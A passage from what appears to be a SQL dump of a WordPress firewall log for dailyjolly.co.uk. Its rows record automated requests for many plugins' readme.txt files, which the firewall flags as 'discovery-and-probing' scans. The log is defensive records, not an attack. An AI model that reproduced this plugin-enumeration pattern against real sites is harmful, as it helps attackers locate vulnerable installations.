scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbWFnZS1ob3Zlci1lZmZlY3RzLXVsdGltYXRlL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbWFnZS1ob3Zlci1lZmZlY3RzLXVsdGltYXRlL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12455,1674981606.474039,1674981606.367800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/image-hover-effects-ultimate/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbWFnZS1ob3Zlci1lZmZlY3RzLXVsdGltYXRlL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbWFnZS1ob3Zlci1lZmZlY3RzLXVsdGltYXRlL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12456,1674981617.159589,1674981617.007800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/shortcode-addons/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaG9ydGNvZGUtYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaG9ydGNvZGUtYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12457,1674981617.159473,1674981617.007800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/shortcode-addons/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaG9ydGNvZGUtYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaG9ydGNvZGUtYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12458,1674981611.622485,1674981611.510600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/woo-product-table/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcHJvZHVjdC10YWJsZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcHJvZHVjdC10YWJsZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12459,1674981611.622375,1674981611.510600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/woo-product-table/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcHJvZHVjdC10YWJsZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcHJvZHVjdC10YWJsZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12460,1674981622.684915,1674981622.559400,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/scripts-organizer/plugins/meta-box/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zY3JpcHRzLW9yZ2FuaXplci9wbHVnaW5zL21ldGEtYm94L3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zY3JpcHRzLW9yZ2FuaXplci9wbHVnaW5zL21ldGEtYm94L3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12461,1674981622.684791,1674981622.559400,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/scripts-organizer/plugins/meta-box/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zY3JpcHRzLW9yZ2FuaXplci9wbHVnaW5zL21ldGEtYm94L3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zY3JpcHRzLW9yZ2FuaXplci9wbHVnaW5zL21ldGEtYm94L3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12462,1674981660.069789,1674981659.910300,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/capability-manager-enhanced/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXR5LW1hbmFnZXItZW5oYW5jZWQvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXR5LW1hbmFnZXItZW5oYW5jZWQvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12463,1674981660.069669,1674981659.910300,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/capability-manager-enhanced/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXR5LW1hbmFnZXItZW5oYW5jZWQvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXR5LW1hbmFnZXItZW5oYW5jZWQvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12464,1674982832.675695,1674982832.551400,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/wpcargo/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGNhcmdvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGNhcmdvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12465,1674982832.675564,1674982832.551400,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/wpcargo/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGNhcmdvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGNhcmdvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12466,1674982839.034238,1674982838.909600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ulisting/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bGlzdGluZy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bGlzdGluZy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12467,1674982839.034139,1674982838.909600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ulisting/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bGlzdGluZy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bGlzdGluZy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12468,1674982838.722098,1674982838.598400,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/ulisting/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bGlzdGluZy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bGlzdGluZy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12469,1674982838.721961,1674982838.598400,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/ulisting/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bGlzdGluZy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bGlzdGluZy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12470,1674982833.439371,1674982833.330800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpcargo/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGNhcmdvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGNhcmdvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12471,1674982833.439268,1674982833.330800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpcargo/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGNhcmdvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGNhcmdvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12472,1674982859.228638,1674982859.102300,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/sitemap-by-click5/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlbWFwLWJ5LWNsaWNrNS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlbWFwLWJ5LWNsaWNrNS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12473,1674982859.228464,1674982859.102300,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/sitemap-by-click5/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlbWFwLWJ5LWNsaWNrNS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlbWFwLWJ5LWNsaWNrNS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12474,1674982881.164062,1674982881.037500,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/nd-learning/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1sZWFybmluZy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1sZWFybmluZy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12475,1674982881.163941,1674982881.037500,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/nd-learning/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1sZWFybmluZy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1sZWFybmluZy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12476,1674982865.111794,1674982865.002400,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/woo-refund-and-exchange-lite/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcmVmdW5kLWFuZC1leGNoYW5nZS1saXRlL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcmVmdW5kLWFuZC1leGNoYW5nZS1saXRlL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12477,1674982865.111696,1674982865.002400,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/woo-refund-and-exchange-lite/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcmVmdW5kLWFuZC1leGNoYW5nZS1saXRlL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcmVmdW5kLWFuZC1leGNoYW5nZS1saXRlL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12478,1674982864.821267,1674982864.685600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/woo-refund-and-exchange-lite/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcmVmdW5kLWFuZC1leGNoYW5nZS1saXRlL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcmVmdW5kLWFuZC1leGNoYW5nZS1saXRlL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12479,1674982864.821151,1674982864.685600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/woo-refund-and-exchange-lite/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcmVmdW5kLWFuZC1leGNoYW5nZS1saXRlL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcmVmdW5kLWFuZC1leGNoYW5nZS1saXRlL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12480,1674982859.825143,1674982859.708100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/sitemap-by-click5/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlbWFwLWJ5LWNsaWNrNS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlbWFwLWJ5LWNsaWNrNS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12481,1674982859.825029,1674982859.708100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/sitemap-by-click5/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlbWFwLWJ5LWNsaWNrNS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlbWFwLWJ5LWNsaWNrNS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12482,1674982882.548095,1674982882.418700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-learning/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1sZWFybmluZy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1sZWFybmluZy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12483,1674982882.547976,1674982882.418700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-learning/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1sZWFybmluZy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1sZWFybmluZy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12484,1674982899.090568,1674982898.978800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-donations/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1kb25hdGlvbnMvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1kb25hdGlvbnMvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12485,1674982899.090468,1674982898.978800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-donations/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1kb25hdGlvbnMvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1kb25hdGlvbnMvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12486,1674982898.774381,1674982898.645200,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/nd-donations/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1kb25hdGlvbnMvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1kb25hdGlvbnMvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12487,1674982898.774211,1674982898.645200,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/nd-donations/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1kb25hdGlvbnMvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1kb25hdGlvbnMvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12488,1674982910.957638,1674982910.847100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/armember-membership/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log 